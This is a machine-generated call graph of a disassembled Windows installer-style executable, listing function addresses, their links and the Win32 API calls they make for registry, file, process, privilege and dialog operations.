402c37 17 API calls 4122->4123 4124 4023f0 4123->4124 4125 402c37 17 API calls 4124->4125 4126 4023fa 4125->4126 4139 402cc7 4126->4139 4129 402885 4130 402432 4132 40243e 4130->4132 4134 402c15 17 API calls 4130->4134 4131 402c37 17 API calls 4133 402428 lstrlenW 4131->4133 4135 40245d RegSetValueExW 4132->4135 4136 4031ba 44 API calls 4132->4136 4133->4130 4134->4132 4137 402473 RegCloseKey 4135->4137 4136->4135 4137->4129 4140 402ce2 4139->4140 4143 40624b 4140->4143 4144 40625a 4143->4144 4145 40240a 4144->4145 4146 406265 RegCreateKeyExW 4144->4146 4145->4129 4145->4130 4145->4131 4146->4145 3320 402862 3321 402c37 17 API calls 3320->3321 3322 402869 FindFirstFileW 3321->3322 3323 402891 3322->3323 3326 40287c 3322->3326 3328 4062f7 wsprintfW 3323->3328 3325 40289a 3329 4063b0 lstrcpynW 3325->3329 3328->3325 3329->3326 4147 4044e2 4148 4044fa 4147->4148 4152 404614 4147->4152 4153 404345 18 API calls 4148->4153 4149 40467e 4150 404748 4149->4150 4151 404688 GetDlgItem 4149->4151 4156 4043ac 8 API calls 4150->4156 4157 4046a2 4151->4157 4158 404709 4151->4158 4152->4149 4152->4150 4154 40464f GetDlgItem SendMessageW 4152->4154 4155 404561 4153->4155 4180 404367 KiUserCallbackDispatcher 4154->4180 4160 404345 18 API calls 4155->4160 4161 404743 4156->4161 4157->4158 4162 4046c8 SendMessageW LoadCursorW SetCursor 4157->4162 4158->4150 4163 40471b 4158->4163 4167 40456e CheckDlgButton 4160->4167 4184 404791 4162->4184 4164 404731 4163->4164 4165 404721 SendMessageW 4163->4165 4164->4161 4169 404737 SendMessageW 4164->4169 4165->4164 4166 404679 4181 40476d 4166->4181 4178 404367 KiUserCallbackDispatcher 4167->4178 4169->4161 4173 40458c GetDlgItem 4179 40437a SendMessageW 4173->4179 4175 4045a2 SendMessageW 4176 4045c8 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4175->4176 4177 4045bf GetSysColor 4175->4177 4176->4161 4177->4176 4178->4173 4179->4175 4180->4166 4182 404780 SendMessageW 4181->4182 4183 40477b 4181->4183 4182->4149 4183->4182 4187 4059d8 ShellExecuteExW 4184->4187 4186 4046f7 LoadCursorW SetCursor 4186->4158 4187->4186 4188 401563 4189 402a65 4188->4189 4192 4062f7 wsprintfW 4189->4192 4191 402a6a 4192->4191 4193 401968 4194 402c15 17 API calls 4193->4194 4195 40196f 4194->4195 4196 402c15 17 API calls 4195->4196 4197 40197c 4196->4197 4198 402c37 17 API calls 4197->4198 4199 401993 lstrlenW 4198->4199 4201 4019a4 4199->4201 4200 4019e5 4201->4200 4205 4063b0 lstrcpynW 4201->4205 4203 4019d5 4203->4200 4204 4019da lstrlenW 4203->4204 4204->4200 4205->4203 4206 4027e9 4207 4027f0 4206->4207 4213 402a6a 4206->4213 4208 402c15 17 API calls 4207->4208 4209 4027f7 4208->4209 4210 402806 SetFilePointer 4209->4210 4211 402816 4210->4211 4210->4213 4214 4062f7 wsprintfW 4211->4214 4214->4213 4215 404b6a 4216 404b96 4215->4216 4217 404b7a 4215->4217 4219 404bc9 4216->4219 4220 404b9c SHGetPathFromIDListW 4216->4220 4226 4059f6 GetDlgItemTextW 4217->4226 4222 404bb3 SendMessageW 4220->4222 4223 404bac 4220->4223 4221 404b87 SendMessageW 4221->4216 4222->4219 4224 40140b 2 API calls 4223->4224 4224->4222 4226->4221 4227 40166a 4228 402c37 17 API calls 4227->4228 4229 401670 4228->4229 4230 4066f3 2 API calls 4229->4230 4231 401676 4230->4231 3779 403e6c 3780 403e84 3779->3780 3781 403fbf 3779->3781 3780->3781 3782 403e90 3780->3782 3783 403fd0 GetDlgItem GetDlgItem 3781->3783 3784 404010 3781->3784 3785 403e9b SetWindowPos 3782->3785 3786 403eae 3782->3786 3787 404345 18 API calls 3783->3787 3788 40406a 3784->3788 3796 401389 2 API calls 3784->3796 3785->3786 3789 403eb3 ShowWindow 3786->3789 3790 403ecb 3786->3790 3791 403ffa SetClassLongW 3787->3791 3792 404391 SendMessageW 3788->3792 3797 403fba 3788->3797 3789->3790 3793 403ed3 DestroyWindow 3790->3793 3794 403eed 3790->3794 3795 40140b 2 API calls 3791->3795 3819 40407c 3792->3819 3798 4042ce 3793->3798 3799 403ef2 SetWindowLongW 3794->3799 3800 403f03 3794->3800 3795->3784 3801 404042 3796->3801 3798->3797 3807 4042ff ShowWindow 3798->3807 3799->3797 3804 403fac 3800->3804 3805 403f0f GetDlgItem 3800->3805 3801->3788 3806 404046 SendMessageW 3801->3806 3802 40140b 2 API calls 3802->3819 3803 4042d0 DestroyWindow KiUserCallbackDispatcher 3803->3798 3859 4043ac 3804->3859 3808 403f22 SendMessageW IsWindowEnabled 3805->3808 3809 403f3f 3805->3809 3806->3797 3807->3797 3808->3797 3808->3809 3812 403f4c 3809->3812 3813 403f93 SendMessageW 3809->3813 3814 403f5f 3809->3814 3823 403f44 3809->3823 3811 4063d2 17 API calls 3811->3819 3812->3813 3812->3823 3813->3804 3816 403f67 3814->3816 3817 403f7c 3814->3817 3820 40140b 2 API calls 3816->3820 3821 40140b 2 API calls 3817->3821 3818 403f7a 3818->3804 3819->3797 3819->3802 3819->3803 3819->3811 3822 404345 18 API calls 3819->3822 3841 404210 DestroyWindow 3819->3841 3850 404345 3819->3850 3820->3823 3824 403f83 3821->3824 3822->3819 3856 40431e 3823->3856 3824->3804 3824->3823 3826 4040f7 GetDlgItem 3827 404114 ShowWindow KiUserCallbackDispatcher 3826->3827 3828 40410c 3826->3828 3853 404367 KiUserCallbackDispatcher 3827->3853 3828->3827 3830 40413e EnableWindow 3835 404152 3830->3835 3831 404157 GetSystemMenu EnableMenuItem SendMessageW 3832 404187 SendMessageW 3831->3832 3831->3835 3832->3835 3834 403e4d 18 API calls 3834->3835 3835->3831 3835->3834 3854 40437a SendMessageW 3835->3854 3855 4063b0 lstrcpynW 3835->3855 3837 4041b6 lstrlenW 3838 4063d2 17 API calls 3837->3838 3839 4041cc SetWindowTextW 3838->3839 3840 401389 2 API calls 3839->3840 3840->3819 3841->3798 3842 40422a CreateDialogParamW 3841->3842 3842->3798 3843 40425d 3842->3843 3844 404345 18 API calls 3843->3844 3845 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3844->3845 3846 401389 2 API calls 3845->3846 3847 4042ae 3846->3847 3847->3797 3848 4042b6 ShowWindow 3847->3848 3849 404391 SendMessageW 3848->3849 3849->3798 3851 4063d2 17 API calls 3850->3851 3852 404350 SetDlgItemTextW 3851->3852 3852->3826 3853->3830 3854->3835 3855->3837 3857 404325 3856->3857 3858 40432b SendMessageW 3856->3858 3857->3858 3858->3818 3860 4043c4 GetWindowLongW 3859->3860 3870 40444d 3859->3870 3861 4043d5 3860->3861 3860->3870 3862 4043e4 GetSysColor 3861->3862 3863 4043e7 3861->3863 3862->3863 3864 4043f7 SetBkMode 3863->3864 3865 4043ed SetTextColor 3863->3865 3866 404415 3864->3866 3867 40440f GetSysColor 3864->3867 3865->3864 3868 404426 3866->3868 3869 40441c SetBkColor 3866->3869 3867->3866 3868->3870 3871 404440 CreateBrushIndirect 3868->3871 3872 404439 DeleteObject 3868->3872 3869->3868 3870->3797 3871->3870 3872->3871 4232 401ced 4233 402c15 17 API calls 4232->4233 4234 401cf3 IsWindow 4233->4234 4235 401a20 4234->4235 3873 40176f 3874 402c37 17 API calls 3873->3874 3875 401776 3874->3875 3876 401796 3875->3876 3877 40179e 3875->3877 3912 4063b0 lstrcpynW 3876->3912 3913 4063b0 lstrcpynW 3877->3913 3880 4017a9 3882 405c81 3 API calls 3880->3882 3881 40179c 3884 406644 5 API calls 3881->3884 3883 4017af lstrcatW 3882->3883 3883->3881 3900 4017bb 3884->3900 3885 4066f3 2 API calls 3885->3900 3886 405e7d 2 API calls 3886->3900 3888 4017cd CompareFileTime 3888->3900 3889 40188d 3891 405414 24 API calls 3889->3891 3890 401864 3892 405414 24 API calls 3890->3892 3902 401879 3890->3902 3894 401897 3891->3894 3892->3902 3893 4063b0 lstrcpynW 3893->3900 3895 4031ba 44 API calls 3894->3895 3896 4018aa 3895->3896 3897 4018be SetFileTime 3896->3897 3898 4018d0 CloseHandle 3896->3898 3897->3898 3901 4018e1 3898->3901 3898->3902 3899 4063d2 17 API calls 3899->3900 3900->3885 3900->3886 3900->3888 3900->3889 3900->3890 3900->3893 3900->3899 3907 405a12 MessageBoxIndirectW 3900->3907 3911 405ea2 GetFileAttributesW CreateFileW 3900->3911 3903 4018e6 3901->3903 3904 4018f9 3901->3904 3905 4063d2 17 API calls 3903->3905 3906 4063d2 17 API calls 3904->3906 3908 4018ee lstrcatW 3905->3908 3909 401901 3906->3909 3907->3900 3908->3909 3910 405a12 MessageBoxIndirectW 3909->3910 3910->3902 3911->3900 3912->3881 3913->3880 4243 402570 4244 402c37 17 API calls 4243->4244 4245 402577 4244->4245 4248 405ea2 GetFileAttributesW CreateFileW 4245->4248 4247 402583 4248->4247 4256 401b71 4257 401bc2 4256->4257 4258 401b7e 4256->4258 4259 401bc7 4257->4259 4260 401bec GlobalAlloc 4257->4260 4261 4022de 4258->4261 4266 401b95 4258->4266 4269 401c07 4259->4269 4277 4063b0 lstrcpynW 4259->4277 4262 4063d2 17 API calls 4260->4262 4263 4063d2 17 API calls 4261->4263 4262->4269 4265 4022eb 4263->4265 4271 405a12 MessageBoxIndirectW 4265->4271 4275 4063b0 lstrcpynW 4266->4275 4267 401bd9 GlobalFree 4267->4269 4270 401ba4 4276 4063b0 lstrcpynW 4270->4276 4271->4269 4273 401bb3 4278 4063b0 lstrcpynW 4273->4278 4275->4270 4276->4273 4277->4267 4278->4269 4279 401a72 4280 402c15 17 API calls 4279->4280 4281 401a78 4280->4281 4282 402c15 17 API calls 4281->4282 4283 401a20 4282->4283 4284 4024f2 4285 402c77 17 API calls 4284->4285 4286 4024fc 4285->4286 4287 402c15 17 API calls 4286->4287 4288 402505 4287->4288 4289 402521 RegEnumKeyW 4288->4289 4290 40252d RegEnumValueW 4288->4290 4291 402885 4288->4291 4292 402542 RegCloseKey 4289->4292 4290->4292 4292->4291 4294 401573 4295 401583 ShowWindow 4294->4295 4296 40158c 4294->4296 4295->4296 4297 40159a ShowWindow 4296->4297 4298 402abf 4296->4298 4297->4298 4299 4014f5 SetForegroundWindow 4300 402abf 4299->4300 4301 401e77 4302 402c37 17 API calls 4301->4302 4303 401e7d 4302->4303 4304 402c37 17 API calls 4303->4304 4305 401e86 4304->4305 4306 402c37 17 API calls 4305->4306 4307 401e8f 4306->4307 4308 402c37 17 API calls 4307->4308 4309 401e98 4308->4309 4310 401423 24 API calls 4309->4310 4311 401e9f 4310->4311 4318 4059d8 ShellExecuteExW 4311->4318 4313 401ee1 4314 40683b 5 API calls 4313->4314 4316 402885 4313->4316 4315 401efb CloseHandle 4314->4315 4315->4316 4318->4313 4326 40167b 4327 402c37 17 API calls 4326->4327 4328 401682 4327->4328 4329 402c37 17 API calls 4328->4329 4330 40168b 4329->4330 4331 402c37 17 API calls 4330->4331 4332 401694 MoveFileW 4331->4332 4333 4016a0 4332->4333 4334 4016a7 4332->4334 4336 401423 24 API calls 4333->4336 4335 4066f3 2 API calls 4334->4335 4338 40224a 4334->4338 4337 4016b6 4335->4337 4336->4338 4337->4338 4339 406176 36 API calls 4337->4339 4339->4333 4340 403a7c 4341 403a87 4340->4341 4342 403a8b 4341->4342 4343 403a8e GlobalAlloc 4341->4343 4343->4342 3972 40247e 3983 402c77 3972->3983 3975 402c37 17 API calls 3976 402491 3975->3976 3977 40249c RegQueryValueExW 3976->3977 3982 402885 3976->3982 3978 4024c2 RegCloseKey 3977->3978 3979 4024bc 3977->3979 3978->3982 3979->3978 3988 4062f7 wsprintfW 3979->3988 3984 402c37 17 API calls 3983->3984 3985 402c8e 3984->3985 3986 40621d RegOpenKeyExW 3985->3986 3987 402488 3986->3987 3987->3975 3988->3978 4344 4020fe 4345 402c37 17 API calls 4344->4345 4346 402105 4345->4346 4347 402c37 17 API calls 4346->4347 4348 40210f 4347->4348 4349 402c37 17 API calls 4348->4349 4350 402119 4349->4350 4351 402c37 17 API calls 4350->4351 4352 402123 4351->4352 4353 402c37 17 API calls 4352->4353 4354 40212d 4353->4354 4355 40216c CoCreateInstance 4354->4355 4356 402c37 17 API calls 4354->4356 4359 40218b 4355->4359 4356->4355 4357 401423 24 API calls 4358 40224a 4357->4358 4359->4357 4359->4358 4360 4019ff 4361 402c37 17 API calls 4360->4361 4362 401a06 4361->4362 4363 402c37 17 API calls 4362->4363 4364 401a0f 4363->4364 4365 401a16 lstrcmpiW 4364->4365 4366 401a28 lstrcmpW 4364->4366 4367 401a1c 4365->4367 4366->4367 3183 401f00 3198 402c37 3183->3198 3190 401f39 CloseHandle 3193 402885 3190->3193 3194 401f2b 3195 401f30 3194->3195 3196 401f3b 3194->3196 3223 4062f7 wsprintfW 3195->3223 3196->3190 3199 402c43 3198->3199 3224 4063d2 3199->3224 3202 401f06 3204 405414 3202->3204 3205 40542f 3204->3205 3213 401f10 3204->3213 3206 40544b lstrlenW 3205->3206 3207 4063d2 17 API calls 3205->3207 3208 405474 3206->3208 3209 405459 lstrlenW 3206->3209 3207->3206 3211 405487 3208->3211 3212 40547a SetWindowTextW 3208->3212 3210 40546b lstrcatW 3209->3210 3209->3213 3210->3208 3211->3213 3214 40548d SendMessageW SendMessageW SendMessageW 3211->3214 3212->3211 3215 405995 CreateProcessW 3213->3215 3214->3213 3216 401f16 3215->3216 3217 4059c8 CloseHandle 3215->3217 3216->3190 3216->3193 3218 40683b WaitForSingleObject 3216->3218 3217->3216 3219 406855 3218->3219 3220 406867 GetExitCodeProcess 3219->3220 3266 4067c6 3219->3266 3220->3194 3223->3190 3238 4063df 3224->3238 3225 40662a 3226 402c64 3225->3226 3257 4063b0 lstrcpynW 3225->3257 3226->3202 3241 406644 3226->3241 3228 4065f8 lstrlenW 3228->3238 3231 4063d2 10 API calls 3231->3228 3232 40650d GetSystemDirectoryW 3232->3238 3234 406520 GetWindowsDirectoryW 3234->3238 3235 406644 5 API calls 3235->3238 3236 40659b lstrcatW 3236->3238 3237 406554 SHGetSpecialFolderLocation 3237->3238 3240 40656c SHGetPathFromIDListW CoTaskMemFree 3237->3240 3238->3225 3238->3228 3238->3231 3238->3232 3238->3234 3238->3235 3238->3236 3238->3237 3239 4063d2 10 API calls 3238->3239 3250 40627e 3238->3250 3255 4062f7 wsprintfW 3238->3255 3256 4063b0 lstrcpynW 3238->3256 3239->3238 3240->3238 3248 406651 3241->3248 3242 4066cc CharPrevW 3245 4066c7 3242->3245 3243 4066ba CharNextW 3243->3245 3243->3248 3245->3242 3246 4066ed 3245->3246 3246->3202 3247 4066a6 CharNextW 3247->3248 3248->3243 3248->3245 3248->3247 3249 4066b5 CharNextW 3248->3249 3262 405cae 3248->3262 3249->3243 3258 40621d 3250->3258 3253 4062b2 RegQueryValueExW RegCloseKey 3254 4062e2 3253->3254 3254->3238 3255->3238 3256->3238 3257->3226 3259 40622c 3258->3259 3260 406230 3259->3260 3261 406235 RegOpenKeyExW 3259->3261 3260->3253 3260->3254 3261->3260 3263 405cb4 3262->3263 3264 405cca 3263->3264 3265 405cbb CharNextW 3263->3265 3264->3248 3265->3263 3267 4067e3 PeekMessageW 3266->3267 3268 4067f3 WaitForSingleObject 3267->3268 3269 4067d9 DispatchMessageW 3267->3269 3268->3219 3269->3267 4368 401000 4369 401037 BeginPaint GetClientRect 4368->4369 4370 40100c DefWindowProcW 4368->4370 4372 4010f3 4369->4372 4373 401179 4370->4373 4374 401073 CreateBrushIndirect FillRect DeleteObject 4372->4374 4375 4010fc 4372->4375 4374->4372 4376 401102 CreateFontIndirectW 4375->4376 4377 401167 EndPaint 4375->4377 4376->4377 4378 401112 6 API calls 4376->4378 4377->4373 4378->4377 4379 401503 4380 40150b 4379->4380 4382 40151e 4379->4382 4381 402c15 17 API calls 4380->4381 4381->4382 3345 402306 3346 402314 3345->3346 3347 40230e 3345->3347 3349 402c37 17 API calls 3346->3349 3350 402322 3346->3350 3348 402c37 17 API calls 3347->3348 3348->3346 3349->3350 3351 402c37 17 API calls 3350->3351 3354 402330 3350->3354 3351->3354 3352 402c37 17 API calls 3353 402339 WritePrivateProfileStringW 3352->3353 3354->3352 4390 401f86 4391 402c37 17 API calls 4390->4391 4392 401f8d 4391->4392 4393 40678a 5 API calls 4392->4393 4394 401f9c 4393->4394 4395 401fb8 GlobalAlloc 4394->4395 4396 402020 4394->4396 4395->4396 4397 401fcc 4395->4397 4398 40678a 5 API calls 4397->4398 4399 401fd3 4398->4399 4400 40678a 5 API calls 4399->4400 4401 401fdd 4400->4401 4401->4396 4405 4062f7 wsprintfW 4401->4405 4403 402012 4406 4062f7 wsprintfW 4403->4406 4405->4403 4406->4396 4407 405388 4408 405398 4407->4408 4409 4053ac 4407->4409 4410 40539e 4408->4410 4419 4053f5 4408->4419 4411 4053b4 IsWindowVisible 4409->4411 4413 4053cb 4409->4413 4415 404391 SendMessageW 4410->4415 4412 4053c1 4411->4412 4411->4419 4420 404cde SendMessageW 4412->4420 4414 4053fa CallWindowProcW 4413->4414 4425 404d5e 4413->4425 4417 4053a8 4414->4417 4415->4417 4419->4414 4421 404d01 GetMessagePos ScreenToClient SendMessageW 4420->4421 4422 404d3d SendMessageW 4420->4422 4423 404d35 4421->4423 4424 404d3a 4421->4424 4422->4423 4423->4413 4424->4422 4434 4063b0 lstrcpynW 4425->4434 4427 404d71 4435 4062f7 wsprintfW 4427->4435 4429 404d7b 4430 40140b 2 API calls 4429->4430 4431 404d84 4430->4431 4436 4063b0 lstrcpynW 4431->4436 4433 404d8b 4433->4419 4434->4427 4435->4429 4436->4433 4437 402388 4438 402390 4437->4438 4439 4023bb 4437->4439 4441 402c77 17 API calls 4438->4441 4440 402c37 17 API calls 4439->4440 4442 4023c2 4440->4442 4443 402397 4441->4443 4448 402cf5 4442->4448 4445 402c37 17 API calls 4443->4445 4446 4023cf 4443->4446 4447 4023a8 RegDeleteValueW RegCloseKey 4445->4447 4447->4446 4449 402d0b 4448->4449 4451 402d21 4449->4451 4452 402d2a 4449->4452 4451->4446 4453 40621d RegOpenKeyExW 4452->4453 4458 402d58 4453->4458 4454 402d7e RegEnumKeyW 4455 402d95 RegCloseKey 4454->4455 4454->4458 4456 40678a 5 API calls 4455->4456 4459 402da5 4456->4459 4457 402db6 RegCloseKey 4462 402da9 4457->4462 4458->4454 4458->4455 4458->4457 4460 402d2a 6 API calls 4458->4460 4458->4462 4461 402dc4 RegDeleteKeyW 4459->4461 4459->4462 4460->4458 4461->4462 4462->4451 3355 403489 SetErrorMode GetVersion 3356 4034c8 3355->3356 3357 4034ce 3355->3357 3358 40678a 5 API calls 3356->3358 3359 40671a 3 API calls 3357->3359 3358->3357 3360 4034e4 lstrlenA 3359->3360 3360->3357 3361 4034f4 3360->3361 3362 40678a 5 API calls 3361->3362 3363 4034fb 3362->3363 3364 40678a 5 API calls 3363->3364 3365 403502 3364->3365 3366 40678a 5 API calls 3365->3366 3367 40350e #17 OleInitialize SHGetFileInfoW 3366->3367 3446 4063b0 lstrcpynW 3367->3446 3370 40355a GetCommandLineW 3447 4063b0 lstrcpynW 3370->3447 3372 40356c GetModuleHandleW 3373 403584 3372->3373 3374 405cae CharNextW 3373->3374 3375 403593 CharNextW 3374->3375 3376 4036bd GetTempPathW 3375->3376 3385 4035ac 3375->3385 3448 403458 3376->3448 3378 4036d5 3379 4036d9 GetWindowsDirectoryW lstrcatW 3378->3379 3380 40372f DeleteFileW 3378->3380 3381 403458 12 API calls 3379->3381 3458 402f14 GetTickCount GetModuleFileNameW 3380->3458 3384 4036f5 3381->3384 3382 405cae CharNextW 3382->3385 3384->3380 3387 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3384->3387 3385->3382 3391 4036a8 3385->3391 3393 4036a6 3385->3393 3386 403743 3388 4037fa ExitProcess CoUninitialize 3386->3388 3394 4037e6 3386->3394 3401 405cae CharNextW 3386->3401 3392 403458 12 API calls 3387->3392 3389 403930 3388->3389 3390 403810 3388->3390 3397 4039b4 ExitProcess 3389->3397 3398 403938 GetCurrentProcess OpenProcessToken 3389->3398 3561 405a12 3390->3561 3544 4063b0 lstrcpynW 3391->3544 3399 403727 3392->3399 3393->3376 3488 403abe 3394->3488 3405 403950 LookupPrivilegeValueW AdjustTokenPrivileges 3398->3405 3406 403984 3398->3406 3399->3380 3399->3388 3411 403762 3401->3411 3402 4037f6 3402->3388 3405->3406 3407 40678a 5 API calls 3406->3407 3410 40398b 3407->3410 3408 4037c0 3545 405d89 3408->3545 3409 403826 3412 40597d 5 API calls 3409->3412 3414 4039a0 ExitWindowsEx 3410->3414 3415 4039ad 3410->3415 3411->3408 3411->3409 3416 40382b lstrcatW 3412->3416 3414->3397 3414->3415 3571 40140b 3415->3571 3419 403847 lstrcatW lstrcmpiW 3416->3419 3420 40383c lstrcatW 3416->3420 3419->3388 3421 403863 3419->3421 3420->3419 3423 403868 3421->3423 3424 40386f 3421->3424 3427 4058e3 4 API calls 3423->3427 3426 405960 2 API calls 3424->3426 3425 4037db 3560 4063b0 lstrcpynW 3425->3560 3429 403874 SetCurrentDirectoryW 3426->3429 3430 40386d 3427->3430 3431 403884 3429->3431 3432 40388f 3429->3432 3430->3429 3565 4063b0 lstrcpynW 3431->3565 3566 4063b0 lstrcpynW 3432->3566 3435 4063d2 17 API calls 3436 4038ce DeleteFileW 3435->3436 3437 4038db CopyFileW 3436->3437 3443 40389d 3436->3443 3437->3443 3438 403924 3439 406176 36 API calls 3438->3439 3441 40392b 3439->3441 3441->3388 3442 4063d2 17 API calls 3442->3443 3443->3435 3443->3438 3443->3442 3444 405995 2 API calls 3443->3444 3445 40390f CloseHandle 3443->3445 3567 406176 MoveFileExW 3443->3567 3444->3443 3445->3443 3446->3370 3447->3372 3449 406644 5 API calls 3448->3449 3450 403464 3449->3450 3451 40346e 3450->3451 3574 405c81 lstrlenW CharPrevW 3450->3574 3451->3378 3454 405960 2 API calls 3455 40347c 3454->3455 3577 405ed1 3455->3577 3581 405ea2 GetFileAttributesW CreateFileW 3458->3581 3460 402f57 3487 402f64 3460->3487 3582 4063b0 lstrcpynW 3460->3582 3462 402f7a 3583 405ccd lstrlenW 3462->3583 3466 402f8b GetFileSize 3467 40308c 3466->3467 3485 402fa2 3466->3485 3588 402e72 3467->3588 3471 403127 3474 402e72 32 API calls 3471->3474 3472 4030cf GlobalAlloc 3473 4030e6 3472->3473 3477 405ed1 2 API calls 3473->3477 3474->3487 3476 4030b0 3478 40342b ReadFile 3476->3478 3480 4030f7 CreateFileW 3477->3480 3481 4030bb 3478->3481 3479 402e72 32 API calls 3479->3485 3482 403131 3480->3482 3480->3487 3481->3472 3481->3487 3603 403441 SetFilePointer 3482->3603 3484 40313f 3604 4031ba 3484->3604 3485->3467 3485->3471 3485->3479 3485->3487 3619 40342b 3485->3619 3487->3386 3489 40678a 5 API calls 3488->3489 3490 403ad2 3489->3490 3491 403ad8 GetUserDefaultUILanguage 3490->3491 3492 403aea 3490->3492 3651 4062f7 wsprintfW 3491->3651 3494 40627e 3 API calls 3492->3494 3496 403b1a 3494->3496 3495 403ae8 3652 403d94 3495->3652 3497 403b39 lstrcatW 3496->3497 3499 40627e 3 API calls 3496->3499 3497->3495 3499->3497 3501 405d89 18 API calls 3502 403b6b 3501->3502 3503 403bff 3502->3503 3505 40627e 3 API calls 3502->3505 3504 405d89 18 API calls 3503->3504 3506 403c05 3504->3506 3508 403b9d 3505->3508 3507 403c15 LoadImageW 3506->3507 3509 4063d2 17 API calls 3506->3509 3510 403cbb 3507->3510 3511 403c3c RegisterClassW 3507->3511 3508->3503 3513 403bbe lstrlenW 3508->3513 3516 405cae CharNextW 3508->3516 3509->3507 3512 40140b 2 API calls 3510->3512 3514 403c72 SystemParametersInfoW CreateWindowExW 3511->3514 3543 403cc5 3511->3543 3515 403cc1 3512->3515 3517 403bf2 3513->3517 3518 403bcc lstrcmpiW 3513->3518 3514->3510 3523 403d94 18 API calls 3515->3523 3515->3543 3521 403bbb 3516->3521 3520 405c81 3 API calls 3517->3520 3518->3517 3519 403bdc GetFileAttributesW 3518->3519 3522 403be8 3519->3522 3524 403bf8 3520->3524 3521->3513 3522->3517 3525 405ccd 2 API calls 3522->3525 3526 403cd2 3523->3526 3667 4063b0 lstrcpynW 3524->3667 3525->3517 3528 403d61 3526->3528 3529 403cde ShowWindow 3526->3529 3660 4054e7 OleInitialize 3528->3660 3531 40671a 3 API calls 3529->3531 3533 403cf6 3531->3533 3532 403d67 3534 403d83 3532->3534 3535 403d6b 3532->3535 3536 403d04 GetClassInfoW 3533->3536 3538 40671a 3 API calls 3533->3538 3537 40140b 2 API calls 3534->3537 3541 40140b 2 API calls 3535->3541 3535->3543 3539 403d18 GetClassInfoW RegisterClassW 3536->3539 3540 403d2e DialogBoxParamW 3536->3540 3537->3543 3538->3536 3539->3540 3542 40140b 2 API calls 3540->3542 3541->3543 3542->3543 3543->3402 3544->3393 3679 4063b0 lstrcpynW 3545->3679 3547 405d9a 3548 405d2c 4 API calls 3547->3548 3549 405da0 3548->3549 3550 4037cc 3549->3550 3551 406644 5 API calls 3549->3551 3550->3388 3559 4063b0 lstrcpynW 3550->3559 3556 405db0 3551->3556 3552 405de1 lstrlenW 3553 405dec 3552->3553 3552->3556 3555 405c81 3 API calls 3553->3555 3557 405df1 GetFileAttributesW 3555->3557 3556->3550 3556->3552 3558 405ccd 2 API calls 3556->3558 3680 4066f3 FindFirstFileW 3556->3680 3557->3550 3558->3552 3559->3425 3560->3394 3562 405a27 3561->3562 3563 40381e ExitProcess 3562->3563 3564 405a3b MessageBoxIndirectW 3562->3564 3564->3563 3565->3432 3566->3443 3568 406197 3567->3568 3569 40618a 3567->3569 3568->3443 3683 405ffc 3569->3683 3572 401389 2 API calls 3571->3572 3573 401420 3572->3573 3573->3397 3575 403476 3574->3575 3576 405c9d lstrcatW 3574->3576 3575->3454 3576->3575 3578 405ede GetTickCount GetTempFileNameW 3577->3578 3579 405f14 3578->3579 3580 403487 3578->3580 3579->3578 3579->3580 3580->3378 3581->3460 3582->3462 3584 405cdb 3583->3584 3585 405ce1 CharPrevW 3584->3585 3586 402f80 3584->3586 3585->3584 3585->3586 3587 4063b0 lstrcpynW 3586->3587 3587->3466 3589 402e83 3588->3589 3590 402e9b 3588->3590 3593 402e93 3589->3593 3594 402e8c DestroyWindow 3589->3594 3591 402ea3 3590->3591 3592 402eab GetTickCount 3590->3592 3595 4067c6 2 API calls 3591->3595 3592->3593 3596 402eb9 3592->3596 3593->3472 3593->3487 3622 403441 SetFilePointer 3593->3622 3594->3593 3595->3593 3597 402ec1 3596->3597 3598 402eee CreateDialogParamW ShowWindow 3596->3598 3597->3593 3623 402e56 3597->3623 3598->3593 3600 402ecf wsprintfW 3601 405414 24 API calls 3600->3601 3602 402eec 3601->3602 3602->3593 3603->3484 3605 4031e5 3604->3605 3606 4031c9 SetFilePointer 3604->3606 3626 4032c2 GetTickCount 3605->3626 3606->3605 3611 4032c2 42 API calls 3612 40321c 3611->3612 3613 403288 ReadFile 3612->3613 3616 40322b 3612->3616 3618 403282 3612->3618 3613->3618 3615 405f25 ReadFile 3615->3616 3616->3615 3616->3618 3641 405f54 WriteFile 3616->3641 3618->3487 3620 405f25 ReadFile 3619->3620 3621 40343e 3620->3621 3621->3485 3622->3476 3624 402e65 3623->3624 3625 402e67 MulDiv 3623->3625 3624->3625 3625->3600 3627 4032f0 3626->3627 3628 40341a 3626->3628 3643 403441 SetFilePointer 3627->3643 3630 402e72 32 API calls 3628->3630 3635 4031ec 3630->3635 3631 4032fb SetFilePointer 3637 403320 3631->3637 3632 40342b ReadFile 3632->3637 3634 402e72 32 API calls 3634->3637 3635->3618 3639 405f25 ReadFile 3635->3639 3636 405f54 WriteFile 3636->3637 3637->3632 3637->3634 3637->3635 3637->3636 3638 4033fb SetFilePointer 3637->3638 3644 40690b 3637->3644 3638->3628 3640 403205 3639->3640 3640->3611 3640->3618 3642 405f72 3641->3642 3642->3616 3643->3631 3645 406930 3644->3645 3646 406938 3644->3646 3645->3637 3646->3645 3647 4069c8 GlobalAlloc 3646->3647 3648 4069bf GlobalFree 3646->3648 3649 406a36 GlobalFree 3646->3649 3650 406a3f GlobalAlloc 3646->3650 3647->3645 3647->3646 3648->3647 3649->3650 3650->3645 3650->3646 3651->3495 3653 403da8 3652->3653 3668 4062f7 wsprintfW 3653->3668 3655 403e19 3669 403e4d 3655->3669 3657 403b49 3657->3501 3658 403e1e 3658->3657 3659 4063d2 17 API calls 3658->3659 3659->3658 3672 404391 3660->3672 3662 404391 SendMessageW 3663 405543 CoUninitialize 3662->3663 3663->3532 3665 405531 3665->3662 3666 40550a 3666->3665 3675 401389 3666->3675 3667->3503 3668->3655 3670 4063d2 17 API calls 3669->3670 3671 403e5b SetWindowTextW 3670->3671 3671->3658 3673 4043a9 3672->3673 3674 40439a SendMessageW 3672->3674 3673->3666 3674->3673 3677 401390 3675->3677 3676 4013fe 3676->3666 3677->3676 3678 4013cb MulDiv SendMessageW 3677->3678 3678->3677 3679->3547 3681 406714 3680->3681 3682 406709 FindClose 3680->3682 3681->3556 3682->3681 3684 406052 GetShortPathNameW 3683->3684 3685 40602c 3683->3685 3687 406171 3684->3687 3688 406067 3684->3688 3710 405ea2 GetFileAttributesW CreateFileW 3685->3710 3687->3568 3688->3687 3690 40606f wsprintfA 3688->3690 3689 406036 CloseHandle GetShortPathNameW 3689->3687 3691 40604a 3689->3691 3692 4063d2 17 API calls 3690->3692 3691->3684 3691->3687 3693 406097 3692->3693 3711 405ea2 